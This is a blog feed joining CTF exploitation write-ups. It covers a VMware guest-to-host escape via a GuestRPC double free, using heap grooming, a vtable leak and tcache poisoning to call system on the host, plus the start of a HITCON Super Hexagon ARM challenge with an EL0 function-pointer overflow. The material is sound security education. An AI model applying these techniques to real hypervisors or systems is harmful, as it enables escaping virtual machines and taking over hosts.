<p>Between the leak and the tcache corruption, we’re able to call <code class="highlighter-rouge">system("/usr/bin/xcalc")</code> in the host process with roughly 50% reliability. The bulk of the unreliability relates to the heap groom, and could be improved at least somewhat by performing the full exploit from the kernel module rather than shelling out to VMware tooling. However, shelling out saved me a good chunk of time that would otherwise have been spent re-implementing the VMware interface, so laziness won out in the end.</p>
<div><video style="width: 100%; height: 100%;" preload="metadata" controls=""><source src="/blog/assets/video/zdi-19-421.mp4" type='video/mp4; codecs="avc1.42E01E, mp4a.40.2"' /></video></div>
<p>Here’s a video of the final exploit popping a shell on the host. As a quick note, this video is edited to skip over the heap spray; the unedited run takes roughly twice as long.</p>
<h2 id="parting-thoughts">Parting thoughts</h2>
<p>This was an interesting exploit that involved diving deep into USB standards and VMware virtual device implementations. It seems like these devices provide a rich attack surface to the guest, including significant numbers of devices exposed by default. From an attacker perspective, I’d definitely love to mentally diff hardware specifications against virtual implementations.</p>
<p>Unlike in my previous post, which looked only at the vcpu heap, taming heap instability appears to be a challenge in the main vmx heap. This will definitely be an area of interest for me moving forward, since my next challenge involves exploiting a bug in the virtual E1000 device. Reading through publicly available writeups and presentations, I found at least one primitive (SVGA buffers) which I did not investigate, but more personal research in this area would be beneficial.</p>
<p>VMware is a moving target with constant bugfixes and new features. There’s a lot of cool functionality to dig into and a rich history of online information about exploitation. I had a lot of fun writing this exploit and learning about USB. You can find my final solution script in my <a href="https://github.com/nafod/advent-vmpwn">advent-vmpwn</a> github repo, which I will release shortly after some cleanup. If you want even more, VMware is also a target in this year’s Pwn2Own Vancouver, which will be held on March 18-20. Otherwise, see you soon in part 3 to read about E1000.</p>
<h2 id="useful-links">Useful Links</h2>
<p><a href="https://www.zerodayinitiative.com/blog/2019/5/7/taking-control-of-vmware-through-the-universal-host-controller-interface-part-1">ZDI’s writeup for the bug, based on Fluoroacetate’s exploit</a> (I didn’t consult this while pwning)</p>
Pwning VMWare, Part 1: RWCTF 2018 Station-Escape (2019-12-21) https://nafod.net/blog/2019/12/21/station-escape-vmware-pwn
<p>Since December rolled around, I have been working on pwnables related to VMware breakouts as part of my advent calendar for 2019. Advent calendars are a fun way to get motivated to get familiar with a target you’re always putting off, and I had a lot of success learning about V8 with my calendar from <a href="https://nafod.net/blog/2019/02/13/advent-browserpwn-2018.html">last year</a>.</p>
<p>To that end, my calendar this year is lighter on challenges than last year. VMware has been part of significantly fewer CTFs than browsers, and the only recent and interesting challenge I noticed was <code class="highlighter-rouge">Station-Escape</code> from Real World CTF Finals 2018. To fill out the rest of the calendar, I picked up two additional bugs used at Pwn2Own this year by the talented Fluoroacetate duo. I plan to write an additional blog post about the exploitation of those challenges once complete, with a more broad look at VMware exploitation and attack surface. For now I’ll focus solely on the CTF pwnable and limit my scope to the sections relating to the challenge.</p>
<p>As a final note, I exploited VMware on <code class="highlighter-rouge">Ubuntu 18.04</code> which was the system used by the organizers during RWCTF. On other systems the exploitation could be wildly different and more complicated, due to the change in underlying heap implementation.</p>
<h2 id="the-environment-briefly">The environment (briefly)</h2>
<p>I debugged this challenge by using the VMware Workstation bundle inside of another VMware vm. After booting up the victim, I ssh’d into it and then attached to it with gdb in order to debug the <code class="highlighter-rouge">vmware-vmx</code> process. The actual guest OS doesn’t matter; in my case, I also used <code class="highlighter-rouge">Ubuntu 18.04</code> simply because I had just downloaded the iso.</p>
<h2 id="diffing-for-the-bug">Diffing for the bug</h2>
<p>The challenge itself is distributed with a vmware bundle file and a specific patched VMX binary. Once we install the bundle and compare the <code class="highlighter-rouge">vmware-vmx-patched</code> to the real <code class="highlighter-rouge">vmware-vmx</code> in bindiff, we find just a single patched code block, amounting to a byte patch of only a few bytes.</p>
<p><a href="https://i.imgur.com/mufmCqN.png"><img src="https://i.imgur.com/mufmCqN.png" alt="bindiff graph comparison" /></a></p>
<p>And, in the decompiler, with some comments</p>
<pre><code class="language-clike">v26->state = 1;
v26->virt_time = VmTime_ReadVirtualTime();
sub_1D8D00(0, v5);
v6 = (void (__fastcall *)(__int64, _QWORD, _QWORD))v26->fp_close_backdoor;
v7 = vm_get_user_reg32(3);
v6(v26->field_48, v5, v7 & 0x21); // guestrpc_close_backdoor
LODWORD(v8) = 0x10000;
</code></pre>
<p>Luckily, the changes are very small, and amount to nopping out a write to a struct field and changing the mask applied to a user-controlled flag value.</p>
<p>The change itself is to a function responsible for handling VMware GuestRPC, an interface that allows the guest system to interact with the host via string-based requests, like a command interface. <a href="http://sysprogs.com/legacy/articles/kdvmware/guestrpc.shtml">Much has been written about GuestRPC before</a>, but briefly, it provides an ASCII interface to hypervisor internals. Most commands are short strings in the form of setters and getters, like <code class="highlighter-rouge">tools.capability.dnd_version 3</code> or <code class="highlighter-rouge">unity.operation.request</code>. Internally, the commands are sent over “channels”, of which there can be 8 at a time per guest. The flow of operations in a single request includes:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0. Open channel
1. Send command length
2. Send command data
3. Receive reply size
4. Receive reply data
5. "Finalize" transfer
6. Close channel
</code></pre></div></div>
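<p>For concreteness, each step above corresponds to a backdoor subcommand issued via an <code class="highlighter-rouge">in</code> instruction on the VMware I/O port. The constants and subcommand numbering below come from public documentation of the backdoor protocol (e.g. open-vm-tools), not from this challenge’s binary, so treat them as a sketch:</p>

<pre><code class="language-python"># GuestRPC backdoor encoding (numbers taken from public open-vm-tools
# sources; treat them as an assumption rather than verified here).
BDOOR_MAGIC   = 0x564D5868   # 'VMXh', loaded into EAX
BDOOR_PORT    = 0x5658       # 'VX', the I/O port in DX
BDOOR_CMD_MSG = 0x1E         # the GuestRPC "message" command

# Subcommands matching the request flow listed above.
SUBCMD = {
    "open":      0,
    "send_len":  1,
    "send_data": 2,
    "recv_len":  3,
    "recv_data": 4,
    "finalize":  5,   # the buggy handler in this challenge
    "close":     6,
}

def guestrpc_ecx(name):
    """ECX value for an 'in eax, dx' backdoor call: subcommand in
    the high 16 bits, message command in the low 16 bits."""
    return (SUBCMD[name] << 16) | BDOOR_CMD_MSG

print(hex(guestrpc_ecx("finalize")))  # -> 0x5001e
</code></pre>

<p>An actual exploit wraps this encoding in inline assembly (or a small kernel module) to perform the port I/O from inside the guest.</p>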
<p>As a final note, guestrpc requests can be issued from guest userspace, so bugs in this interface are particularly interesting from an attacker perspective.</p>
<h2 id="the-bug">The bug</h2>
<p>Examining the changes, we find that they’re all in request type 5, corresponding to <code class="highlighter-rouge">GUESTRPC_FINALIZE</code>. The user controls the argument which is <code class="highlighter-rouge">& 0x21</code> and passed to <code class="highlighter-rouge">guestrpc_close_backdoor</code>.</p>
<pre><code class="language-clike">void __fastcall guestrpc_close_backdoor(__int64 a1, unsigned __int16 a2, char a3)
{
  __int64 v3; // rbx
  void *v4; // rdi

  v3 = a1;
  v4 = *(void **)(a1 + 8);
  if ( a3 & 0x20 )
  {
    free(v4);
  }
  else if ( !(a3 & 0x10) )
  {
    sub_176D90(v3, 0);
    if ( *(_BYTE *)(v3 + 0x20) )
    {
      vmx_log("GuestRpc: Closing RPCI backdoor channel %u after send completion\n", a2);
      guestrpc_close_channel(a2);
      *(_BYTE *)(v3 + 32) = 0;
    }
  }
}
<p>Control of <code class="highlighter-rouge">a3</code> allows us to go down the first branch in a previously inaccessible manner, letting us free the buffer at <code class="highlighter-rouge">a1+0x8</code>, which corresponds to the buffer used internally to store the reply data passed back to the user. However, this same buffer will also be freed with command type 6, <code class="highlighter-rouge">GUESTRPC_CLOSE</code>, resulting in a controlled double free which we can turn into use-after-free. (The other patch nop’d out code responsible for NULLing out the reply buffer, which would have prevented this codepath from being exploited.)</p>
<p>Given that the bug is very similar to a traditional CTF heap pwnable, we can already envision a rough path forward, for which we’ll fill in details shortly:</p>
<ul>
<li>Obtain a leak, ideally of the <code class="highlighter-rouge">vmware-vmx</code> binary text section</li>
<li>Use tcache to allocate a chunk on top of a function pointer</li>
<li>Obtain <code class="highlighter-rouge">rip</code> and <code class="highlighter-rouge">rdi</code> control and invoke <code class="highlighter-rouge">system("/usr/bin/xcalc &")</code></li>
</ul>
<h2 id="heap-internals-and-obtaining-a-leak">Heap internals and obtaining a leak</h2>
<p>Firstly, it should be stated that the vmx heap appears to have little churn in a mostly idle VM, at least in the heap section used for guestrpc requests. This means that the exploit can be relatively reliable even if the VM has been running for a bit or if the user was previously using the system.</p>
<p>In order to obtain a heap leak, we’ll perform the following series of operations</p>
<ol>
<li>Allocate three channels [A], [B], and [C]</li>
<li>Send the <code class="highlighter-rouge">info-set</code> command to channel [A], which allows us to store arbitrary data of arbitrary size (up to a limit) in the host heap.</li>
<li>Open channel [B] and issue an <code class="highlighter-rouge">info-get</code> to retrieve the data we just set</li>
<li>Issue the reply length and reply read commands on channel [B]</li>
<li>Invoke the buggy finalize command on channel [B], freeing the underlying reply buffer</li>
<li>Invoke <code class="highlighter-rouge">info-get</code> on channel [C] and receive the reply length, which allocates a buffer at the same address we just freed</li>
<li>Close channel [B], freeing the buffer again</li>
<li>Read out the reply on channel [C] to leak our data</li>
</ol>
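<p>Why steps 5 through 8 alias the two channels can be seen with a toy LIFO freelist (a simplification of tcache, not glibc itself): once channel [B]’s reply buffer is freed early, the very next same-sized allocation, channel [C]’s reply, reuses the same address, so closing [B] frees memory that [C] still references:</p>

<pre><code class="language-python"># Toy LIFO freelist modelling the use-after-free in steps 5-8.
# Addresses are fake; only the reuse ordering matters.

freelist = []          # LIFO stack of freed addresses
next_fresh = [0x1000]  # bump allocator for never-freed memory

def alloc():
    if freelist:
        return freelist.pop()   # reuse the most recently freed chunk
    addr = next_fresh[0]
    next_fresh[0] += 0x100
    return addr

def free(addr):
    freelist.append(addr)

reply_b = alloc()   # step 4: channel [B]'s reply buffer
free(reply_b)       # step 5: buggy finalize frees it early
reply_c = alloc()   # step 6: channel [C]'s reply reuses that address
assert reply_c == reply_b
free(reply_b)       # step 7: closing [B] frees [C]'s live buffer
# step 8: reading [C]'s reply now reads freed, reusable memory
</code></pre>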
<p>Each <code class="highlighter-rouge">vmware-vmx</code> process has a number of associated threads, including one thread per guest vCPU. This means that the underlying glibc heap has both the tcache mechanism active and several different heap arenas. Although we can avoid mixing up our tcache chunks by pinning our guest process to a single vCPU, we still cannot directly leak a <code class="highlighter-rouge">libc</code> pointer, because only the <code class="highlighter-rouge">main_arena</code> actually resides inside libc; thread arenas live in separate mappings. As a result, we can only leak a pointer to our individual thread arena, which is less useful in our case.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[#0] Id 1, Name: "vmware-vmx", stopped, reason: STOPPED
[#1] Id 2, Name: "vmx-vthread-300", stopped, reason: STOPPED
[#2] Id 3, Name: "vmx-vthread-301", stopped, reason: STOPPED
[#3] Id 4, Name: "vmx-mks", stopped, reason: STOPPED
[#4] Id 5, Name: "vmx-svga", stopped, reason: STOPPED
[#5] Id 6, Name: "threaded-ml", stopped, reason: STOPPED
[#6] Id 7, Name: "vmx-vcpu-0", stopped, reason: STOPPED <-- our vCPU thread
[#7] Id 8, Name: "vmx-vcpu-1", stopped, reason: STOPPED
[#8] Id 9, Name: "vmx-vcpu-2", stopped, reason: STOPPED
[#9] Id 10, Name: "vmx-vcpu-3", stopped, reason: STOPPED
[#10] Id 11, Name: "vmx-vthread-353", stopped, reason: STOPPED
. . . .
</code></pre></div></div>
<p>To get around this, we’ll modify the above flow to spray some other object containing a vtable pointer. I came across <a href="http://acez.re/the-weak-bug-exploiting-a-heap-overflow-in-vmware/">this writeup</a> by Amat Cama, which details his 2017 exploitation using drag-n-drop and copy-paste structures that are allocated in the host vCPU heap when you send certain guestrpc commands.</p>
<p>Therefore, I updated the above flow as follows to leak out a vtable/<code class="highlighter-rouge">vmware-vmx</code>-bss pointer</p>
<ol>
<li>Allocate four channels [A], [B], [C], and [D]</li>
<li>Send the <code class="highlighter-rouge">info-set</code> command to channel [A], which allows us to store arbitrary data of arbitrary size (up to a limit) in the host heap.</li>
<li>Open channel [B] and issue an <code class="highlighter-rouge">info-get</code> to retrieve the data we just set</li>
<li>Issue the reply length and reply read commands on channel [B]</li>
<li>Invoke the buggy finalize command on channel [B], freeing the underlying reply buffer</li>
<li>Invoke <code class="highlighter-rouge">info-get</code> on channel [C] and receive the reply length, which allocates a buffer at the same address we just freed</li>
<li>Close channel [B], freeing the buffer again</li>
<li>Send <code class="highlighter-rouge">vmx.capability.dnd_version</code> on channel [D], which allocates an object with a vtable on top of the chunk referenced by [C]</li>
<li>Read out the reply on channel [C] to leak the vtable pointer</li>
</ol>
<p>One thing I did notice is that the copy-paste and drag-n-drop structures appear to only allocate their vtable-containing objects once per guest execution lifetime. This could complicate leaking pointers inside VMs where guest tools are installed and actively being used. In a more reliable exploit, we would hope to create a more repeatable arbitrary read-and-write primitive, maybe with these heap constructions alone. From there, we could trace backwards to leak our vmx binary.</p>
<h2 id="overwriting-a-channel-structure">Overwriting a channel structure</h2>
<p>Once we have obtained a vtable leak, we can begin looking for interesting structures in the BSS. <code class="highlighter-rouge">vmware-vmx</code> has <code class="highlighter-rouge">system</code> in its GOT, so we can also jump to the stub as a proxy for <code class="highlighter-rouge">system</code>’s address.</p>
<p>I chose to target the underlying <code class="highlighter-rouge">channel_t</code> structures which are created when you open a guestrpc channel. <code class="highlighter-rouge">vmware-vmx</code> has an array of 8 of these structures (size 0x60) inside its BSS, with each structure containing several buffer pointers, lengths, and function pointers.</p>
<p>Most notably, this structure matches up favorably to our code above in <code class="highlighter-rouge">GUESTRPC_FINALIZE</code></p>
<pre><code class="language-clike">// v6 is read from the channel structure...
v6 = (void (__fastcall *)(__int64, _QWORD, _QWORD))v26->fp_close_backdoor;
// . . . .
// ... and so is the first argument
v6(v26->field_48, v5, v7 & 0x21); // guestrpc_close_backdoor
</code></pre>
<p>To target this, we’ll abuse the tcache mechanism in glibc 2.27, the glibc version in use on the host system. In that version of glibc, tcache was completely unprotected, and by overwriting the first quadword of a freed chunk on a tcache freelist, we can allocate a chunk of that size anywhere in memory by simply allocating that size twice afterwards. Therefore, we make our exploit land on top of a channel structure, set bogus fields to control the function pointer and argument, and then invoke <code class="highlighter-rouge">GUESTRPC_FINALIZE</code> to call <code class="highlighter-rouge">system("/usr/bin/xcalc")</code>. The full steps are as follows:</p>
<ol>
<li>Allocate five channels [A], [B], [C], [D], and [E]</li>
<li>Send the <code class="highlighter-rouge">info-set</code> command to channel [A], which allows us to store arbitrary data of arbitrary size (up to a limit) in the host heap.
a. This time, populate the <code class="highlighter-rouge">info-set</code> value such that its first 8 bytes are a pointer to the <code class="highlighter-rouge">channel_t</code> array in the BSS.</li>
<li>Open channel [B] and issue an <code class="highlighter-rouge">info-get</code> to retrieve the data we just set</li>
<li>Issue the reply length and reply read commands on channel [B]</li>
<li>Invoke the buggy finalize command on channel [B], freeing the underlying reply buffer</li>
<li>Invoke <code class="highlighter-rouge">info-get</code> on channel [C] and receive the reply length, which allocates a buffer at the same address we just freed</li>
<li>Close channel [B], freeing the buffer again</li>
<li>Invoke <code class="highlighter-rouge">info-get</code> on channel [D] to flush one chunk from the tcache list; the next chunk will land on our channel</li>
<li>Send a “command” to [E] consisting of fake chunk data padded to our buggy chunksize. This will land on our <code class="highlighter-rouge">channel_t</code> BSS data and give us control over a channel</li>
<li>Invoke <code class="highlighter-rouge">GUESTRPC_FINALIZE</code> on our corrupted channel to pop calc</li>
</ol>
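<p>The tcache mechanics underlying steps 2a, 8, and 9 reduce to a classic glibc-2.27 poison. Here is a minimal model (fake addresses, a dict standing in for heap memory) of why two allocations after the fd clobber land on the <code class="highlighter-rouge">channel_t</code> array:</p>

<pre><code class="language-python"># Minimal model of glibc-2.27 tcache poisoning: the fd pointer in a
# freed chunk's first quadword is followed with no integrity checks.

memory = {}            # addr -> value of the chunk's first quadword
tcache_head = [None]   # head of one tcache bin

def tc_free(addr):
    memory[addr] = tcache_head[0]      # fd = old head
    tcache_head[0] = addr

def tc_alloc():
    addr = tcache_head[0]
    tcache_head[0] = memory.get(addr)  # follow fd, unchecked
    return addr

chunk = 0x55550000          # the double-freed reply buffer (fake addr)
channel_array = 0x404000    # leaked channel_t BSS address (fake addr)

tc_free(chunk)
memory[chunk] = channel_array   # step 2a: info-set data clobbers fd
first  = tc_alloc()             # step 8: flushes our chunk
second = tc_alloc()             # step 9: lands on the channel array
assert first == chunk and second == channel_array
</code></pre>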
<div style="width: 100%; height: 0px; position: relative; padding-bottom: 51.250%;"><iframe src="https://streamable.com/s/ajb09/koafmy" frameborder="0" width="100%" height="100%" allowfullscreen="" style="width: 100%; height: 100%; position: absolute;"></iframe></div>
<p><br /></p>
<h2 id="conclusion">Conclusion</h2>
<p>This was definitely a light challenge with which to dip my feet in VMware exploitation. The exploitation itself was pretty vanilla heap work, but the overall challenge did involve some RE on the <code class="highlighter-rouge">vmware-vmx</code> binary, and required becoming familiar with some of the attack surface exposed to the guest. For a CTF challenge, it hit roughly the appropriate intersection of “real world” and “solvable in 48 hours” that you would expect from a high quality event. You can find my final solution script in my <a href="https://github.com/nafod/advent-vmpwn">advent-vmpwn</a> github repo.</p>
<p>From here on out, my advent calendar involves 2 CVEs, both of which are in virtual hardware devices implemented by the <code class="highlighter-rouge">vmware-vmx</code> binary. Furthermore, neither has a public POC nor details on exploitation, so they should be more interesting to dive in to. So, stay tuned for my next post if you’re interested on digging into the underpinnings of USB ;)</p>
<h2 id="useful-links">Useful Links</h2>
<p><a href="http://acez.re/the-weak-bug-exploiting-a-heap-overflow-in-vmware/">The Weak Bug - Exploiting a Heap Overflow in VMware</a>
<a href="https://zhuanlan.zhihu.com/p/52140921">Real World CTF 2018 Finals Station-Escape Writeup</a> (challenge files are linked here!)</p>
There and Back Again: HITCON 2018’s Super Hexagon (2019-08-02) https://nafod.net/blog/2019/08/02/hitcon-2018-super-hexagon
<p>One of the most interesting and unique CTF challenges I’ve seen over the past year was the “Super Hexagon” challenge from HITCON 2018. The challenge is unlike any other in several ways. A single bios.bin is distributed to the player that contains six (!) different levels to pwn, spread across all current exception levels, and involving both armv7 and aarch64 execution.</p>
<p>Each level requires the full gamut of exploitation skills; reversing, attack surface analysis, bug hunting, exploitation, and stable execution. Furthermore, challenges involving ARM Secure World attacks have been scarce in CTF, despite the prevalence of TrustZone in devices all around us. During the CTF itself, only one team (Dragon Sector) solved all 6 levels, and only 2 teams reached level 4. Since I missed working on the challenge during the CTF, I decided to revisit it here ahead of the upcoming HITCON 2019 CTF to solve and discuss all 6 levels of the challenge. Let’s begin!</p>
<h3 id="a-brief-overview">A Brief Overview</h3>
<p><img src="/blog/assets/images/super-hexagon-levels.png" alt="challenge layout" /></p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Super Hexagon
Escape each level for your six flags.
EL0 - Hard
EL1 - Harder
EL2 - Hardest
S-EL0 - Hardester
S-EL1 - Hardestest
S-EL3 - Hardestestest
</code></pre></div></div>
<p>The challenge authors distributed a single targz consisting of a docker setup, with a qemu-system-aarch64 binary and a bios.blob. We also receive two qemu patches. One of them adds support for a new ARM machine “hitcon”, and the other patches QEMU to allow debugging ARM and thumb modes inside qemu-system-aarch64 - more on that later. The first <code class="highlighter-rouge">qemu.patch</code> also contains some useful physical memory layout information, which will inform our efforts later.</p>
<pre><code class="language-cpp=">static const MemMapEntry memmap[] = {
    /* Space up to 0x8000000 is reserved for a boot ROM */
    [VIRT_FLASH] =      {          0, 0x08000000 },
    [VIRT_CPUPERIPHS] = { 0x08000000, 0x00020000 },
    [VIRT_UART] =       { 0x09000000, 0x00001000 },
    [VIRT_SECURE_MEM] = { 0x0e000000, 0x01000000 },
    [VIRT_MEM] =        { 0x40000000, RAMLIMIT_BYTES },
};
</code></pre>
<p>The challenge is distributed with a dockerfile, but to avoid dealing with docker we can create the required path on our own system (<code class="highlighter-rouge">/home/super_hexagon/</code>) and copy the binaries and flag folders there. When we run it, we’re presented with the following boot log:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>NOTICE: UART console initialized
INFO: MMU: Mapping 0 - 0x2844 (783)
INFO: MMU: Mapping 0xe000000 - 0xe204000 (40000000000703)
INFO: MMU: Mapping 0x9000000 - 0x9001000 (40000000000703)
NOTICE: MMU enabled
NOTICE: BL1: HIT-BOOT v1.0
INFO: BL1: RAM 0xe000000 - 0xe204000
INFO: SCTLR_EL3: 30c5083b
INFO: SCR_EL3: 00000738
INFO: Entry point address = 0x40100000
INFO: SPSR = 0x3c9
VERBOSE: Argument #0 = 0x0
VERBOSE: Argument #1 = 0x0
VERBOSE: Argument #2 = 0x0
VERBOSE: Argument #3 = 0x0
NOTICE: UART console initialized
[VMM] RO_IPA: 00000000-0000c000
[VMM] RW_IPA: 0000c000-0003c000
[KERNEL] mmu enabled
INFO: TEE PC: e400000
INFO: TEE SPSR: 1d3
NOTICE: TEE OS initialized
[KERNEL] Starting user program ...
=== Trusted Keystore ===
Command:
0 - Load key
1 - Save key
cmd>
</code></pre></div></div>
<p>From the log alone we can already derive some useful information, including virtual address ranges and translation table entries. A “TEE OS” is mentioned, which is likely resident in S-EL1. We also see the entrypoint for our input, which is a menu containing some key operations. Playing with these doesn’t yield anything interesting yet, however.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>=== Trusted Keystore ===
Command:
0 - Load key
1 - Save key
cmd> 1
index: 0
key: hello
[0] <= hello
cmd> 0
index: 0
[0] => 0e00
cmd>
index:
[0] => 0e00
cmd>
</code></pre></div></div>
<h3 id="initial-reversing">Initial Reversing</h3>
<p>Opening the binary in IDA and disassembling the entrypoint yields instructions that look sufficiently like the start of EL3.</p>
<pre><code class="language-asm=">0x0004 MOVK X0, #0x30C5,LSL#16 ; Set bits M, C, I
0x0008 MSR 6, c1, c0, #0, X0 ; [>] SCTLR_EL3 (System Control Register (EL3))
0x000C ISB
0x0010 ADR X0, el3_interrupt_table
0x0014 MSR #6, c12, c0, #0, X0 ; [>] VBAR_EL3 (Vector Base Address Register (EL3))
0x0018 ISB
0x001C MOV X1, #0b1000000001010
0x0020 MRS X0, #6, c1, c0, #0 ; [<] SCTLR_EL3 (System Control Register (EL3))
0x0024 ORR X0, X0, X1
0x0028 MSR #6, c1, c0, #0, X0 ; [>] SCTLR_EL3 (System Control Register (EL3))
0x002C ISB
0x0030 MOV X0, #0x238 ; Set bits EA, SIF
0x0034 MSR #6, c1, c1, #0, X0 ; [>] SCR_EL3 (Secure Configuration Register)
0x0038 MOV X0, #0x8000
0x003C MOVK X0, #1,LSL#16
0x0040 MSR #6, c1, c3, #1, X0 ; [>] MDCR_EL3 (Monitor Debug Configuration Register (EL3))
0x0044 MSR #7, #4 ; Clr PSTATE.DAIF [-A--]
0x0048 MOV X0, #0
0x004C MSR #6, c1, c1, #2, X0 ; [>] CPTR_EL3 (Architectural Feature Trap Register (EL3))
0x0050 LDR X0, =0xE002000
0x0054 LDR X1, =0x202000
</code></pre>
<p>The binary begins by setting up several MSRs and copying code from the ROM into specific physical addresses. These will be a useful jumping off point for identifying the start of other code blobs, since the EL2/EL1/S-EL1 code is all mapped here by EL3. Tracing down further we find MMU initialization, and then a drop to a lower EL for further setup.</p>
<p>But where is EL1? Searching for some of the menu strings (“0 - Load key”) and scrolling around yields something interesting: bios.bin contains an ELF header at offset 0xbc010.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>000bbfe0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000bbff0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000bc000: 3200 0000 0000 0000 0000 0000 0000 0000 2...............
000bc010: 7f45 4c46 0201 0100 0000 0000 0000 0000 .ELF............ <--
000bc020: 0200 b700 0100 0000 e800 4000 0000 0000 ..........@.....
000bc030: 4000 0000 0000 0000 c8a7 0000 0000 0000 @...............
</code></pre></div></div>
<h3 id="el0-getting-started">EL0: Getting started</h3>
<p>Extracting the header yields a valid, statically linked ELF file with debug symbols. <code class="highlighter-rouge">checksec</code> tells us there is no ASLR, but NX is enabled (we can confirm this is enforced in our debugger). The ELF looks very similar to a standard Linux userland binary, and comes baked with simple libc functions (printf/puts/read/scanf). Based on the strings and functionality, this is definitely our EL0 code. The first thing the binary does is load an opaque trustlet blob via syscall, followed by mapping some “world shared memory” buffers.</p>
<pre><code class="language-cpp=">void load_trustlet(unsigned __int8 *base, int size)
{
  size_t v4;
  void *v5;
  unsigned int v6;
  TCI *v7;
  unsigned int v8;

  v4 = (size + 4095) & 0xFFFFF000;
  v5 = mmap(0LL, v4, 3, 0, 0, -1LL);
  v6 = tc_register_wsm(v5, (void *)v4);
  if ( v6 == -1 )
  {
    printf("tc_register_wsm: failed to register world shared memory\n");
    exit(0xFFFFFFFFLL);
  }
  memcpy(v5, base, size);
  if ( (unsigned int)tc_init_trustlet(v6, size) )
  {
    printf("tc_init_trustlet: failed to load trustlet\n");
    exit(0xFFFFFFFFLL);
  }
  v7 = (TCI *)mmap(0LL, 0x1000uLL, 3, 0, 0, -1LL);
  v8 = tc_register_wsm(v7, (void *)0x1000);
  if ( v8 == -1 )
  {
    printf("tc_register_wsm: failed to register world shared memory\n");
    exit(0xFFFFFFFFLL);
  }
  tci_buf = v7;
  tci_handle = v8;
}
</code></pre>
<p>We can surmise that the WSM buffers are likely shared mappings between normal and secure world. After setting up the trustlet code, the binary initializes a function pointer table with two functions, then goes into a loop calling the <code class="highlighter-rouge">run()</code> function for 10 iterations.</p>
<pre><code class="language-cpp=">void run()
{
  int64_t buf_len;
  int idx;
  int cmd;

  printf("cmd> ");
  scanf("%d", &cmd);
  printf("index: ");
  scanf("%d", &idx);
  if ( cmd == 1 )
  {
    printf("key: ");
    scanf("%s", buf); // <---- [A]
    buf_len = (unsigned int)strlen(buf);
  }
  else
  {
    buf_len = 0LL;
  }
  (cmdtb[cmd])(buf, (unsigned int)idx, buf_len); // <---- [B]
}
</code></pre>
<p>This function is trivially vulnerable. At <code class="highlighter-rouge">[A]</code>, we use the uncontrolled <code class="highlighter-rouge">%s</code> format specifier with <code class="highlighter-rouge">scanf()</code> to read into a buf created with <code class="highlighter-rouge">mmap</code> earlier. At <code class="highlighter-rouge">[B]</code>, we invoke a function pointer from <code class="highlighter-rouge">cmdtb</code>, but the (signed) index is not bounded. For that function call we control the data pointed to by the first argument, <code class="highlighter-rouge">buf</code>, and the lower 32 bits of the second argument, <code class="highlighter-rouge">idx</code>. Since <code class="highlighter-rouge">cmdtb</code> is also in the BSS, let’s further examine the surrounding memory layout there.</p>
<pre><code class="language-=">0x0412650: input ; unsigned __int8 input[256]
0x0412750: cmdtb ; cmd_func cmdtb[2]
0x0412760: tci_handle ; unsigned int tci_handle
0x0412768: buf ; unsigned __int8 *buf
0x0412770: tci_buf ; TCI *tci_buf
</code></pre>
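<p>Given that layout, reaching <code class="highlighter-rouge">input</code> through the unbounded index is simple pointer arithmetic (using the static, no-ASLR addresses above): <code class="highlighter-rouge">cmdtb</code> holds 8-byte function pointers, so the start of <code class="highlighter-rouge">input</code> sits 32 slots below it.</p>

<pre><code class="language-python"># Index arithmetic for reaching `input` through cmdtb[cmd].
input_addr = 0x412650   # start of the input buffer (BSS, no ASLR)
cmdtb_addr = 0x412750   # cmd_func cmdtb[2]

idx = (input_addr - cmdtb_addr) // 8   # 8-byte function pointers
print(idx)  # -> -32: cmdtb[-32] dereferences the start of input
</code></pre>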
<p>The static buffer <code class="highlighter-rouge">input</code> is used directly inside the <code class="highlighter-rouge">scanf()</code> function, which invokes our good old friend <code class="highlighter-rouge">gets()</code>.</p>
<pre><code class="language-cpp=">int scanf(const unsigned __int8 *fmt, ...)
{
  __va_list_tag va[1];
  __va_list_tag ap[1];

  va_start(va, fmt);
  va_start(ap, fmt);
  gets(input); // <---- full control of input
  return vsscanf(input, fmt, (__va_list *)va);
}
</code></pre>
<p>We can write function pointers directly to the <code class="highlighter-rouge">input</code> buffer and then invoke them with a negative <code class="highlighter-rouge">cmdtb</code> offset, for control of PC. But where to go? Scanning the binary reveals an <code class="highlighter-rouge">mprotect</code> syscall, which is perfect. We can populate our shellcode into the <code class="highlighter-rouge">buf</code> pointer with <code class="highlighter-rouge">scanf</code> in an initial pass, then invoke the function again to set <code class="highlighter-rouge">buf_len</code> to 7. Since it’s being read in with <code class="highlighter-rouge">scanf</code>, we’ll write a simple alphanumeric stager to read in our real unrestricted payload.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ERROR: [VMM] RWX pages are not allowed
</code></pre></div></div>
<p>Oops! Seems like the EL2 hypervisor prevents us from mapping RWX. Luckily, we can read in the shellcode first and then just <code class="highlighter-rouge">mprotect</code> it R-X, no problem.</p>
<h3 id="el1-escalating-privileges">EL1: Escalating Privileges</h3>
<p>Now that we can execute arbitrary code in EL0 context, we can begin auditing EL1. For this we return back to bios.bin. We’ll again examine the <code class="highlighter-rouge">memcpy</code> functions invoked by EL3 to find something that looks like EL1. The blob at 0xb0000, aarch64 code, contains strings prefixed with <code class="highlighter-rouge">[KERNEL]</code>, so it’s a safe bet. Our primary concern is the syscall interface, since it’s the only interface we know of exposed to EL0. We find the syscall function handler at 0xB8BA8.</p>
<p>Four main syscalls are exposed to us: <code class="highlighter-rouge">write</code>, <code class="highlighter-rouge">read</code> (only 1 char at a time), <code class="highlighter-rouge">mmap</code>, and <code class="highlighter-rouge">mprotect</code>. We also have a series of secure call passthrough syscalls, which we’ll revisit later. <code class="highlighter-rouge">mmap</code> and <code class="highlighter-rouge">mprotect</code> both perform extensive checking on their arguments.</p>
<pre><code class="language-cpp=">if ( syscall_nr == 0xDE ) // mmap, for example
{
  if ( addr ) // addr must be NULL (no MAP_FIXED)
  {
    prot = -1i64;
  }
  else if ( size & 0xFFF ) // size must be page aligned
  {
    prot = -1i64;
  }
  else
  {
    v12 = el1_find_contiguous_pages(size);
    if ( v12 == -1 )
    {
